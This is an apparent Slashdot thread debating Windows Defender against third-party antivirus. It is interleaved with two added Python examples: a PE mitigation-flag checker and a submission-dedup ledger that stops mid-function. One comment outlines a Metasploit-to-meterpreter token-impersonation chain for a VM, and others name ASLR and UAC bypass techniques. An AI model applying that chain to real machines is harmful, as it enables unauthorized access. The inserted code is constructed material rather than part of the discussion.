    Then you have Windows Defender. It's so plain, you instinctively ignore its presence. Excepting on older XP systems, (where there was a CPU utilization bug), it runs with a very modest system footprint. It does not constantly vomit spam into your system tray, and does not try to milk you for additional service agreements, or to switch to a paid version. It behaves itself very well.

    If Avast or AVG behaved like that, instead of trying to be garishly tawdry and whorishly self-promoting like prostitutes, and reduced their system resource consumption habits accordingly, they would win hands down.

    But no, fleecing idiots is much more profitable.

    1. Re:I tend to agree as well. by cyberfunkr · · Score: 1

      I commented the same way about *four and a half years ago*.
      https://slashdot.org/comments....

      AV spends too much time and resources on making things look pretty, yet scary, instead of actually doing an effective job.

    2. Re:I tend to agree as well. by roca · · Score: 1

      Another poster points out above that inconspicuous third-party AV software would not "win hands down", because to the user it appears they've paid for software that doesn't do anything.

  14. I did a complete 180 on AV software by Billly+Gates · · Score: 3, Insightful

    I started doing PC support in my Field with Grandmas and small business.

    AV software WAS USEFUL in the XP/98 era. I would argue with Slashdotters calling them morons for not running it, as you had 1 min max before infection on Windows 2000 or XP with no firewall!!

    We all ran administrator aka root and Win32 even had account personation services. Gee, a dialup with no firewall or a shitty software one, with IE 6 running Java and Adobe Flash without a sandbox on a local admin account, was the norm so what could possibly go wrong!!??

    Vista, god bless it, made UAC, privilege separation, scrambled RAM addresses with ASLR, buffer-overflow-protected buffers in C/C++, and pseudo local admin accounts which instead used a token to run something. Thanks Theo from OpenBSD for inspiration.

    Windows 10 goes further too by using x86 features to separate data from executable bits directly on the CPU and signed bootloaders.

    AdBlock and sandboxed Adobe products make Windows OK now. Not perfect, but OK.

    I just reused an Asus Sabertooth I threw into storage 2 years ago. I thought it was broken! Why? ESET kept making my SSDs lose data. I thought the SATA ports were bad. Went through 3 expensive SSDs. It was my damn AV software glitching them.

    Keep updates current, run AdBlock, use a DNS service like the free Norton DNS servers on your router, and for heaven's sake don't click everything you download and you will be fine in 2017. AV software forges SSL certificates too, which is dangerous.

    1. Re:I did a complete 180 on AV software by Piata · · Score: 4, Informative

      AV software forging SSL certificates is downright baffling. A client of mine kept having his website marked as insecure despite having an SSL certificate and all tests showing it was working properly. Turns out it was a false positive from his AV software and there's literally nothing you can do about it besides telling someone to uninstall their AV.

    2. Re:I did a complete 180 on AV software by Anonymous Coward · · Score: 0

      I never ran AV software on any computer from the days of DOS through Win7 and only recently have decided to leave Defender enabled on 8.1/10. You know what? I only ever got a single infection. That one infection came from a college computer lab where we were required to place our 3.5" disks in a dedicated lab machine that automatically scanned disks for viruses. That dedicated anti-virus scanning machine had itself been infected and resulted in every student's disk becoming infected and that infection getting brought home. Running AV software at home would not have prevented the infection either as there was no AV solution to prevent this particular virus at the time and none became available for another 3 months. The real solution is to keep secure backups of your data so that wiping your machine is nothing more than a minor inconvenience for the time it takes to re-image.

    3. Re:I did a complete 180 on AV software by Martin+Blank · · Score: 1

      Win32 even had account personation services

      Account impersonation is still there, even in 64-bit Windows. It's required for how Windows works. If you want to see it, set up a VM, run Metasploit against it (use smb_login) and get a meterpreter shell, load incognito, and list and impersonate tokens to your heart's content.

      Vista, god bless it, made UAC, privilege separation, scrambled RAM addresses with ASLR, buffer-overflow-protected buffers in C/C++, and pseudo local admin accounts which instead used a token to run something.

      UAC has numerous bypasses, privilege separation has existed since at least NT4 (maybe 3.51), ASLR only applies to the heap and only when the library or executable is compiled to do so (or is forced by EMET, which can crash some applications), buffer overflow protections can be bypassed using SEH or ROP gadgets, and as I mentioned above, tokens are still around. Another note on ASLR: it only takes one library in the entire chain of libraries called to not use ASLR to make it ineffective. Also, ASLR on 32-bit Windows is weak, having only 128 possible addresses without factoring in predictability that is inherent in the system, and if the process crashes and restarts relatively gracefully, it's not hard to hit a valid address. ASLR on 64-bit Windows is much more difficult to bypass.

      --
      You can never go home again... but I guess you can shop there.
    4. Re:I did a complete 180 on AV software by Martin+Blank · · Score: 1

      That's not true. You can disable the SSL inspection in all of them. Finding the setting may be tricky, but it can be disabled.

      --
      You can never go home again... but I guess you can shop there.
    5. Re:I did a complete 180 on AV software by Anonymous Coward · · Score: 0

      You have to MITM SSL sessions to inspect them for malware payloads.

      Yeah, it's a shitty but common practice. You should see the creepy shit "enterprise" security and content filtering schemes do with SSL.

    6. Re:I did a complete 180 on AV software by l20502 · · Score: 1

      Windows 10 goes further too by using x86 features to separate data from executable bits directly on the CPU and signed bootloaders.

      Just because NX is now a hard requirement doesn't mean previous versions didn't use it, and signed bootloaders are evil.

    7. Re: I did a complete 180 on AV software by Anonymous Coward · · Score: 0

      Yes exactly! Looking at you BLUECOAT

    8. Re:I did a complete 180 on AV software by Billly+Gates · · Score: 1

      So if I were a cracker I would just forge a Norton or McAfee certificate and I could MITM all your freaking data! Hello Superfish from Lenovo all over again, and free banking info now since I decrypted your session to Bank of America. That is scary and a big vulnerability. Enterprises get weekly updates. Home users don't.

    9. Re:I did a complete 180 on AV software by Billly+Gates · · Score: 1

      Windows 10 has SEH handling and it requires work to get around ASLR. It's not impossible, but compared to XP it's a big improvement.

    10. Re:I did a complete 180 on AV software by Billly+Gates · · Score: 1

      We use signed boot loaders at work and for me at home for a VM of Fedora. They provide rootkit protection and yes, CentOS, FreeBSD, and Fedora use bootloaders. You sign your own and add the keys. You do not need to use Microsoft's. Microsoft does have keys for Red Hat based OSes and FreeBSD if you want to go that route instead, but in no way are you hostage to Redmond.

      It's an Intel standard.

    11. Re:I did a complete 180 on AV software by Martin+Blank · · Score: 1

      SEH has been present in some form since at least XP. It's old tech, with numerous bypasses. Windows 10's big improvement is Control Flow Guard.

      Getting around ASLR is relatively easy if any library loads that does not use ASLR, and this is unfortunately very common.

      --
      You can never go home again... but I guess you can shop there.
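Added example, not code from Martin+Blank, Billly+Gates or anyone else in the thread: the point that one non-ASLR library undoes ASLR for the whole process, and that DEP and Control Flow Guard are per-image opt-ins, can be checked directly from the DllCharacteristics field of the PE optional header. This Python reads that field for PE32 and PE32+ images and reports which module in a set opts out of DYNAMIC_BASE. The images in SAMPLE_MODULES are constructed header-only stubs built by make_image (my helper, not a real tool); point the script at real files to check a process's actual modules.

```python
"""Read the per-image exploit mitigations (ASLR via DYNAMIC_BASE, DEP via
NX_COMPAT, Control Flow Guard via GUARD_CF) from a PE optional header and
find the module in a process that opts out of ASLR. Added example, not code
from the thread; the images below are constructed headers, not real binaries."""
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLLCHAR = {
    "HIGH_ENTROPY_VA": 0x0020,   # 64-bit ASLR over the full address space
    "DYNAMIC_BASE": 0x0040,      # image may be relocated: the ASLR opt-in
    "FORCE_INTEGRITY": 0x0080,   # signature enforced at load
    "NX_COMPAT": 0x0100,         # DEP: data pages are not executable
    "NO_SEH": 0x0400,            # image uses no structured exception handlers
    "GUARD_CF": 0x4000,          # Control Flow Guard
}


def dll_characteristics(image):
    """Return the DllCharacteristics field of a PE32 or PE32+ image (header bytes suffice)."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: bad PE signature")
    coff = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    (size_opt,) = struct.unpack_from("<H", image, coff + 16)
    opt = coff + 20                                        # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):                        # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if size_opt < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    (flags,) = struct.unpack_from("<H", image, opt + 70)   # same offset in both formats
    return flags


def mitigations(image):
    """Map each mitigation name to whether the image opted in."""
    flags = dll_characteristics(image)
    return {name: bool(flags & bit) for name, bit in DLLCHAR.items()}


def aslr_opt_outs(modules):
    """Given {module name: image bytes}, list the modules built without DYNAMIC_BASE.
    A single such module hands an attacker fixed addresses for the whole process."""
    return [name for name, img in modules.items() if not mitigations(img)["DYNAMIC_BASE"]]


def make_image(dllchars, pe32plus=True):
    """Build a header-only PE for testing (constructed; not loadable by Windows)."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew)           # e_lfanew at 0x3C
    opt_size = 240 if pe32plus else 224
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x2022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)     # Magic
    struct.pack_into("<H", opt, 70, dllchars)                         # DllCharacteristics
    return dos + b"PE\0\0" + coff + bytes(opt)


# Constructed module set standing in for a process's loaded images.
SAMPLE_MODULES = {
    "app.exe": make_image(0x0020 | 0x0040 | 0x0100 | 0x4000),
    "crypto.dll": make_image(0x0040 | 0x0100),
    "legacy_codec.dll": make_image(0x0000, pe32plus=False),   # old 32-bit build: no ASLR, no DEP
}

if __name__ == "__main__":
    # Usage: python pe_mitigations.py some.exe some.dll ...   (real files; headers only are read)
    paths = sys.argv[1:]
    mods = {p: open(p, "rb").read(4096) for p in paths} if paths else SAMPLE_MODULES
    for name, img in mods.items():
        print(name, sorted(k for k, v in mitigations(img).items() if v))
    print("ASLR opt-outs:", aslr_opt_outs(mods))
```

The field lives at the same offset (70) in both the PE32 and PE32+ optional headers, so one reader covers 32- and 64-bit modules. Run it against every DLL a process has mapped and the first name in the opt-out list is the library that, as the reply says, makes ASLR ineffective for everything else.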
  15. As an insider, can confirm by TodPunk · · Score: 5, Interesting

    I used to work for an AV vendor in their IT department. Others in my family have continued working in the software security industry for decades. They really are just bloated resource suckers with little value. As such, I haven't run anti-virus beyond Windows Defender for a little over 10 years, not even on my kids' computers. They're kept up to date, ads are blocked on my network, and I have taught my kids how to recognize an executable from other kinds of files (thank god for re-enabling file extensions being shown, the stupidest Windows default of them all).

    We had one virus when my daughter opened an email that gave her some nasty popups constantly. She learned a valuable lesson that day, but I was able to reverse it in less than an hour booting into safe mode and removing the files. Been fine otherwise.

    --
    This forum Sig is licensed under the LGPL.
    1. Re:As an insider, can confirm by aliquis · · Score: 1

      Isn't Windows Defender heavier than Bitdefender and Avast or something?
      I saw some test of transaction times to start applications, copy files and such where Windows Defender was slower.

    2. Re:As an insider, can confirm by Anonymous Coward · · Score: 0

      Others in my family have continued working in the software security industry for decades. They really are just bloated resource suckers with little value.

      Your family can't be that bad, can they?

    3. Re:As an insider, can confirm by TodPunk · · Score: 1

      I can't imagine it can be a whole lot more efficient than Windows Defender and still do as much. WD is really, really lean, and only checks for the most common malicious code. It's the 90% rule of anti-malware. If others are more efficient, I'd like to know why they thought they could throw out a given check of some kind, but I can't see how the gains would be that much when WD doesn't really do much in the first place (compared to the big dogs like Symantec or Kaspersky).

      --
      This forum Sig is licensed under the LGPL.
  16. Oh really? by JustNiz · · Score: 1, Insightful

    That does rather presume you're running Windows.
    Which, let's be honest, Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender to avoid loosing all credibility.

    Defender still appears to really just be an easy copout workaround for Microsoft, rather than them addressing the actual problem which is the fundamentally weak architecture of Windows itself.

    1. Re:Oh really? by Ol+Olsoc · · Score: 0

      Defender still appears to really just be an easy copout workaround for Microsoft, rather than them addressing the actual problem which is the fundamentally weak architecture of Windows itself.

      The best antivirus software for Windows is Linux.

      --
      The shepherds did so well protecting the flock that the sheep no longer believed that wolves existed.
    2. Re:Oh really? by Anonymous Coward · · Score: 0

      Historically, yes.

      But they've been beaten with that stick almost constantly for 20 years, and sometimes that sinks in.

      Hence, it's a lot better now. (Not perfect, but a lot better).

    3. Re:Oh really? by Anonymous Coward · · Score: 1

      What malware authors love most about Linux is your attitude. It prevents you from really looking at your machine.

    4. Re:Oh really? by Anonymous Coward · · Score: 0

      Which, lets be honest, Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender

      It is not really viruses we're talking about but either trojans or exploits. I don't think they usually self-replicate.

      I think it's not Windows itself that's full of security holes, but the app model of "double-click on this and brush away a few paragraphs of nonsense warnings to irrevocably merge random Internet code with your operating system forever."

        - There's no option to do that in the browser. Even high-risk things like extensions can be uninstalled.

        - The sheeple are getting herded into "App Stores" with whitelisting, developer reputation records, auto-updating, and, yes, cloud virus scanning (e.g. the Android Bouncer).

      Also, while antivirus on Windows doesn't work, whitelisting works great, even without the app store.

      Linux is somewhere between whitelisting-and-app-store with its package management system. It has always been this way because of the free software convention. Where proprietary software is involved in Linux, it's distributed in goofy ways and is equally risky. There's just so much less of it.

      And for exploits, I think Linux is at least as bad as Windows. My gut impression of the GNOME stuff is, "much worse."

    5. Re:Oh really? by Anonymous Coward · · Score: 0

      Well, Linux used to be secure. Until Apple used Unix as the basis of their OS, and then gained popularity, and then became a financially viable malware target, thus pulling Linux down to their level.

    6. Re:Oh really? by Anonymous Coward · · Score: 0

      that works fine until Linux has the market share of Windows. The advantage Linux currently has is security through obscurity.

    7. Re:Oh really? by chispito · · Score: 1

      Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender to avoid loosing all credibility.

      You misspelled "Android."

      --
      The Daddy casts sleep on the Baby. The Baby resists!
    8. Re:Oh really? by yithar7153 · · Score: 1
      ChromeOS is technically running the Linux kernel, just saying. It's pretty much Gentoo with a different UI in a sandbox on top.

      All code that is natively run is either explicitly vetted by the chain of trust that starts from the embedded controller (the OS and Chrome itself) or permuted such that it cannot escape a narrowly-defined sandbox (NaCl, Pepper plugins, etc). If you have a Chromebook and you're running ChromeOS, it's even better, as the chain of trust starts from the TPM.

    9. Re:Oh really? by JustNiz · · Score: 1

      You presume I'm running Linux? ha.
      30 years later and my Amiga still hasn't had a single malwar
      +++ CARRIER LOST +++

    10. Re:Oh really? by Anonymous Coward · · Score: 0

      My buddy used to work in a mixed windows and linux corporate data center. The linux guys always bragged about their uptime and how the windows guys were always having to reboot to patch the security holes.

      That is, until the first time they got caught with their pants down not updating their Linux boxes with the latest patches and spent the better part of a week rebuilding all their machines. They never bragged about uptime again.

      The moral? Whatever OS you use, if you don't properly maintain it, you WILL get pwned.

    11. Re:Oh really? by RightSaidFred99 · · Score: 1

      2003 called, it wants its information back.

      Windows is very secure, any given set of crap apps you may install on it - not so much.

    12. Re:Oh really? by JustNiz · · Score: 1

      >> Windows is very secure,
      Sure it is. NOT.
      The whole concept of the registry at all is fundamentally insecure, especially one that apps can write mostly anywhere and read nearly everything.
      Windows' security model is also fundamentally borked because it's a collection of workarounds on workarounds, mostly because backwards compatibility has been a higher priority than security, and Microsoft's total control of your PC has a higher priority than anything, including usability.
      Even as admin you can't stop it downloading/applying whatever updates Microsoft feel you should have, or (trying to) phone home to Microsoft and sharing who knows what data about you.
      Windows might be a lot of things, but secure it ain't.

    13. Re:Oh really? by Anonymous Coward · · Score: 0

      "loosing all credibility"

      Yep, you just lost all of it...

    14. Re:Oh really? by Anonymous Coward · · Score: 0

      Better to have layers of protection (unprivileged/sandboxed execution) in the first place. And in general not execute any random binaries.
      When you run the binary, a user running it at full privileges is at the mercy of AV to catch the malicious execution pattern or fingerprint the virus based on a DB. If a virus is new and does something novel, the victim is out of luck and gets infected, ransomed or has credit card info stolen. Backups and not using credit cards on Windows PCs help.

    15. Re:Oh really? by Anonymous Coward · · Score: 0

      Why do you need malware when a single program can take out the whole OS? Now TI-83 calculators modded with Ethernet through the mic port are secure enough to browse the web without AV. Don't forget to buy the keyboard attachment too.

    16. Re:Oh really? by Ol+Olsoc · · Score: 1

      What malware authors love most about Linux is your attitude. It prevents you from really looking at your machine.

      You managed to divine a lot of what my attitude is from a really short post. You must be psychic.

      All Operating Systems have some vulnerabilities. As it turns out Windows has the Lion's share of them.

      --
      The shepherds did so well protecting the flock that the sheep no longer believed that wolves existed.
    17. Re:Oh really? by Ol+Olsoc · · Score: 1

      that works fine until Linux has the market share of Windows. The advantage Linux currently has is security through obscurity.

      Took a while, but finally someone brought that up - Security through obscurity is the computer world's version of trickle down economics.

      From your information, I can state with great assurance that with the recent botnets of Internet of things devices, that there are more of those devices than machines running Windows. Otherwise, they would be quite secure.

      --
      The shepherds did so well protecting the flock that the sheep no longer believed that wolves existed.
    18. Re:Oh really? by JustNiz · · Score: 1

      ..plus having all the benefits of a security model that is from-the-ground-up intended for a multi-user environment.
      Also many details like having an architecture where installing apps doesn't require allowing it to modify your operating system, or putting both your app and OS settings in a shared registry that everything can at least read.

    19. Re:Oh really? by JustNiz · · Score: 1

      >>The advantage Linux currently has is security through obscurity.

      That's utter bullshit considering the Linux kernel runs about 99% of the world's internet servers and smartphones, i.e. all the most connected things.

      >> Internet of things devices, that there are more of those devices than machines running Windows. Otherwise, they would be quite secure.

      Unlike Windows, IOT issues are all to do with clueless companies releasing products with bad configurations, not fundamental issues with the OS itself.
      And further to your point, by far the most infected systems on botnets are actually Windows PCs.

    20. Re:Oh really? by Ol+Olsoc · · Score: 1

      >>The advantage Linux currently has is security through obscurity.

      That's utter bullshit considering the Linux kernel runs about 99% of the world's internet servers and smartphones, i.e. all the most connected things.

      Bullshit it very likely is, but don't attribute to me things that I didn't write. I was replying to a guy and quoted him before my replies. Security through obscurity is something that people who cannot get away from the fact that Windows is a brittle and insecure system say to make themselves feel better about the utter piece of shit operating system that for some reason they defend.

      It isn't real. Hopefully I'm clear on that.

      Internet of things devices, that there are more of those devices than machines running Windows. Otherwise, they would be quite secure.

      Unlike Windows, IOT issues are all to do with clueless companies releasing products with bad configurations, not fundamental issues with the OS itself.

      Sounds like our friends in Redmond. It's exactly how they started out.

      And further to your point, by far the most infected systems on botnets are actually Windows PCs.

      Dude, you are preaching to the choir - you gotta take that up with the guy who I was replying to.

      --
      The shepherds did so well protecting the flock that the sheep no longer believed that wolves existed.
  17. Big surprise by Rubinhood · · Score: 1

    Developers of new software sometimes bump into false positives, and they are either smart enough to avoid malware or never even notice when one gets past their installed virus scanner. So they prefer one of the weakest virus scanners.
      [acts surprised]

  18. RAV Antivirus? by Anonymous Coward · · Score: 1

    RAV Antivirus was bought in 2003 by Microsoft. Not long after that, Microsoft came out with its own antivirus offering. Back in the day, RAV was the best out there, finding and cleaning things the other major makers missed. Hmmm

    1. Re:RAV Antivirus? by Martin+Blank · · Score: 1

      It's actually based on GIANT, not RAV. Both were purchased by Microsoft, but the former was used as the launching point for what would become Windows Defender.

      --
      You can never go home again... but I guess you can shop there.
  19. Re:windows 10 spyware says by Anonymous Coward · · Score: 0

    YOU COW!

  20. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 2, Insightful

    Regardless of anyone's particular sentiments on aPK (he doesn't bother me), black-holing garbage domain names (something something hosts file) and IP addresses (if possible) is an excellent source of additional protection.

  21. Sad to say I have no trouble accepting this by Crashmarik · · Score: 1

    After years of pain from the likes of Norton, McAfee, Sophos, Nod32, all of which can make you want to have a virus instead of the antivirus, Windows Defender is the only one that hasn't compelled me to rip it out.

  22. I agree! by Notabadguy · · Score: 1

    I think Windows Defender is better than any of the AV out there - and that this signifies that MS has finally found its core competency. It needs to get out of the OS business and stick to AV.

    1. Re:I agree! by Anonymous Coward · · Score: 0

      They make fairly decent mice too.

    2. Re: I agree! by Anonymous Coward · · Score: 0

      Microsoft Natural keyboard is just wonderful too.

  23. Utter shite by wbr1 · · Score: 2
    Defender may be well behaved in terms of system utilization and other programmatic things like not installing browser hooks, etc., but it has a history of being poor at actually catching viruses. Just a year or so ago it had an 85-89% catch rate. That may have improved, as it has been a while since I read the literature.

    That said, no AV is a poor prospect too, especially for business. I work for a local break-fix shop that is also branching into MSP work for our small to mid biz clients. Our system uses a modified Bitdefender + site blacklisting. It works well but does have a footprint. I say it is useful though because some of our clients are 30-50 seat law firms, insurance companies, and financial institutions - you would not believe how heavily targeted they are with social engineering attacks designed to install malware. Mostly through email attachments, but there have been DoS attacks, password attacks against open ports, and DNS redirect attacks.

    User training is #1, but AV and good backups have saved the bacon more than once. We see constant removals of crypto virus installers, only 2x in the past 3 years has one actually gotten through by being too new for detection. How many would that be without an AV with a 95%+ catch rate?

    --
    Silence is a state of mime.
    1. Re:Utter shite by The-Ixian · · Score: 1

      Just a year or so ago it had an 85-89% catch rate

      That actually seems really good for AV.

      No AV is a panacea. It's just one tool in the toolbox. 85-89% is a really good starting place if you ask me. Add to that DNS blacklisting, ad blocking, content filtering, application whitelisting and sandboxing, you could have near 100%.

      --
      My eyes reflect the stars and a smile lights up my face.
    2. Re:Utter shite by wbr1 · · Score: 1

      85-89% is not good when competitors have above 90 and 95%. Read up on av-test and av-comparatives. I have not read for about a year, so things could have changed, but my clients are specifically targeted, plus the normal random probing and targeting that goes on. That 10% difference can be the difference between normal operations and a 1-2 day shutdown to recover a cryptolocked server from online backups. Our bill is big for that but not nearly as big as not having your entire firm run for 1-2 days.

      --
      Silence is a state of mime.
    3. Re:Utter shite by Ambassador+Kosh · · Score: 1

      From what I could see in a few different tests windows defender is about 97% and there are a few scanners that go to 99.9% but the higher the detection rate the more likely it also is to suffer from false positives and impact the system negatively while running.

      --
      Computer modeling for biotech drug manufacturing is HARD! :)
    4. Re:Utter shite by wbr1 · · Score: 1
      A question... would you rather have a false positive that stops one or two users from using a program, or a false negative resulting in a crypto virus infection that shuts your entire business down? Our customers pay us monthly, and if there are problematic false positives, we can go straight to the appropriate vendors and get it resolved.

      We recently worked a case where some Vertafore software was conflicting in a strange way with the BitDefender engine. It took a bit to get resolved as it was a deep issue, but now it is fine. We also had issues in the past with a signature collision with a common QuickBooks DLL. That was resolved faster. Is it a pain, yes, but it is less of a pain than recovering 3-5TB of encrypted data and rebuilding a multi-site Windows domain. I know, I have done both.

      --
      Silence is a state of mime.
    5. Re:Utter shite by Anonymous Coward · · Score: 0

      Unless you use Kaspersky, in which case you have 99.8 or 99.9% detection rates and 1 or 0 false positives. There's a reason they are the best.... The rest are still playing catch up.

    6. Re:Utter shite by Anonymous Coward · · Score: 0

      too many false positives means that the alerts are no longer taken seriously. "oh, just another false positive. i need to run it now, so let's just deactivate the d*mn scanner"

    7. Re:Utter shite by roca · · Score: 1

      I wrote about the weaknesses of the AV-Comparatives tests here: http://robert.ocallahan.org/20...
      Testing against only already-identified malware is bogus. But FWIW, Defender has a 97% catch rate in AV-Comparatives' latest report.

    8. Re:Utter shite by Anonymous Coward · · Score: 0

      The catch rate isn't such a useful statistic any more. When using Defender (or some other AV) the median user doesn't get infected. The reason is that operating systems and browsers have become a lot better, so the initial hurdle for a virus to get on the system at all is so high that the AV doesn't even come into it.
      And AVs have downsides as well, so at this point I think it's better to pick the one with the least downsides. Defender doesn't seem to be a big resource hog, it doesn't throw pop-ups in my face, it doesn't break other security and it doesn't cause other software to crash.

    9. Re:Utter shite by wbr1 · · Score: 1

      Good info to have. When I do read on the subject it is only one source. av-test is another. The third is decidedly more anecdotal and subjective, but we see a lot of infected PCs here, with a lot of different AVs. So you do get some clues that way as well.

      --
      Silence is a state of mime.
    10. Re:Utter shite by Martin+Blank · · Score: 1

      If your clients are specifically targeted, no AV is likely to catch the attacks. AV is there to catch the low-hanging fruit, not the ones coming after you specifically.

      --
      You can never go home again... but I guess you can shop there.
    11. Re:Utter shite by Ambassador+Kosh · · Score: 1

      I have had AV software have false positives on software I was compiling and it would delete it immediately. I even tried to mark that area as safe but to no avail. I ended up getting rid of the AV software since I could not get work done that way.

      I have also run into AV software where a bad update went through and the software ended up attacking the OS and did quite a lot of damage in terms of downtime.

      At the end of the day it is easier for me to avoid viruses than it is to deal with most AV software I have encountered, and the one built into Windows seems to do a good enough job. The email I get comes through Gmail, and it seems to do an excellent job of filtering away the spam, malware etc., and the software I download from Intel, MathWorks, NVIDIA, Lawrence Livermore labs etc. is very unlikely to be infected.

      --
      Computer modeling for biotech drug manufacturing is HARD! :)
  24. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 0

    If a popup asked you to disable your firewall or your AV, would you have done that?

  25. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 0

    Indeed, and my preferred is uBlock Origin. Though I have grown rather fond of drivers/etc/hosts. Unlike those claiming a large hosts file degrades performance a bit, I haven't noticed that of any sort. While Microsoft's Defender may not be the most "robust" (read system hog), I think the combination of those three works very well and potentially negates any ill effects of a large hosts file.

  26. Antivirus is useless by Anonymous Coward · · Score: 0

    All the people who need antivirus software still get infected and the people who don't get infected without it obviously don't need it. Antivirus is CYA-software. Nobody is going to tell you not to use antivirus software, because everybody likes their ass covered. We've done what we can, if it still happens, it's someone else's fault. Yeah, right. You're not supposed to unzip the executable file and run it, just because the email says you're going to get sued if you don't pay the attached overdue bill, DUMBASS.

  27. I switched all my Windows machines to Defender by jfdavis668 · · Score: 1

    I was always a fan of Symantec. Their entire suite became a huge resource hog. But, it was always better in antivirus tests. Once I found out that Microsoft stops checking for viruses where the exploit has been fixed in Windows, that made sense. Defender just stopped checking for viruses that will do no harm to the system. Drops the overhead dramatically.

  28. Use GNU/Linux by zakzor · · Score: 4, Insightful

    I don't use any AV software. I don't need to. I have ClamAV in a live session for customers. And that way there's no files locked.

    1. Re:Use GNU/Linux by DrXym · · Score: 1

      That's great and every one can all do the same with absolutely no consideration at all of what they bought the computer for.

    2. Re:Use GNU/Linux by Anonymous Coward · · Score: 0

      What's the longest period of time between Linux security patches? Don't claim your system is secure, no one's is.

  29. There is more to an a/v... by QuietLagoon · · Score: 3, Insightful

    ...Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV....

    There is more, a lot more, to an a/v than what is seen via the myopic view of a browser developer.

    1. Re:There is more to an a/v... by thegarbz · · Score: 1

      Yeah. All those other things that most AV vendors do like forge SSL certificates, behave like rootkits, open your emails before you even click on them (hell even Microsoft stopped this 10 years ago), bypass firewalls and other parts of windows, set themselves up as essentially impossible to remove. ...

      Defender is missing all those features.

  30. Re:Disable ad-blocker for a paragraph of twitter c by jason777 · · Score: 1

    Did they also give ya the subscribe to the newsletter popup for the ultimate trifecta?

  31. Re: MicroShaft by Anonymous Coward · · Score: 5, Informative

    They're not glorifying effectiveness (though most testing shows they all are pretty equal now) instead they're explaining that Microsoft's solution behaves well with applications which is generally true as it's less invasive.

    As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the others I've used.

    Don't get your panties in a bunch.

  32. Sure! It's okay to settle for Defender! by Chas · · Score: 1, Interesting

    As soon as you agree to compensate my clients for lost data when ransomware sneaks in under Defender's nose, maybe I'll pay attention to that brown stuff you're spewing.

    --
    Chas - The one, the only.
    THANK GOD!!!
  33. Re:Disable ad-blocker for a paragraph of twitter c by thomn8r · · Score: 1

    let us know if you see any misbehaving ads

    Yeah - too late by then. Buh-bye!

  34. There is another way: Cylance by Anonymous Coward · · Score: 0

    Cylance does not work in the same manner as traditional AV programs. I'll not go into details here, you can google it if you are interested. It is not a resource hog at all and is resistant to zero-day vulnerabilities. Give it a whirl (caveat: it's enterprise only for now). I have no relationship to the company, but I work in enterprise IT and my company has done a 2K node deploy switching from Kaspersky to Cylance with great success: it stops ransomware, its resource usage is minuscule, it was easy to deploy, there are few updates to worry about, it's centrally manageable. It ain't cheap though, but it does do AV better than anything else I've encountered.

  35. Worse than Nagware by Anonymous Coward · · Score: 0

    About a month ago, I received some updates to some of the programs I normally run. Windows Defender thought they were suspicious and asked me whether to submit them for further analysis. A few hours later, Windows Defender detected those same programs and wanted to submit them for analysis. A few hours after that, Windows Defender had an Alzheimer's and asked to submit those same files again. A few hours after that... repeat this for about a week.

    Windows Defender should be keeping track of all the files submitted. If the md5sum(suspiciousfile) (or better hash algorithm) was already submitted on this computer, do not ask to submit it again. I do not need to be asked multiple times to submit the same files because all it does is make me want to switch to a different AV solution. I am sure Microsoft's AV specialists would appreciate not receiving multiple copies of the same file from one user either.
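
The "remember what was already submitted" logic the poster describes, as an added example that is not part of the thread and not Windows Defender's own code. It keys a small persistent ledger on the SHA-256 of the file's content (the poster's "md5sum or better hash"), so the same file is offered once, while a vendor update that changes the content is treated as new. The ledger format, file names and sample bytes are constructed for illustration.

```python
"""Track which suspicious files have already been offered for vendor
submission, keyed by SHA-256 of content, so the same file is not offered
twice but changed content (same path, new bytes) is offered again.

Added example: not from the thread or from any AV product; the JSON
ledger format and the sample files are assumptions for illustration."""
import hashlib
import json
import os
import tempfile


def sha256_of_file(path: str) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


class SubmissionLedger:
    """Persistent set of content hashes already submitted from this host."""

    def __init__(self, ledger_path: str):
        self.ledger_path = ledger_path
        self._hashes = set()
        if os.path.exists(ledger_path):
            with open(ledger_path) as f:
                self._hashes = set(json.load(f))

    def should_prompt(self, path: str) -> bool:
        """True only if this exact content has never been offered before."""
        return sha256_of_file(path) not in self._hashes

    def record_submission(self, path: str) -> str:
        """Remember the content hash and flush the ledger to disk."""
        digest = sha256_of_file(path)
        self._hashes.add(digest)
        with open(self.ledger_path, "w") as f:
            json.dump(sorted(self._hashes), f)
        return digest


def demo() -> tuple:
    """Constructed scenario: one file offered twice, then updated, then reloaded."""
    d = tempfile.mkdtemp()
    sample = os.path.join(d, "tool.exe")          # constructed sample path
    ledger_file = os.path.join(d, "submitted.json")
    ledger = SubmissionLedger(ledger_file)
    with open(sample, "wb") as f:
        f.write(b"constructed sample build 1")
    first = ledger.should_prompt(sample)          # never seen: prompt
    ledger.record_submission(sample)
    second = ledger.should_prompt(sample)         # same hash: stay quiet
    with open(sample, "wb") as f:
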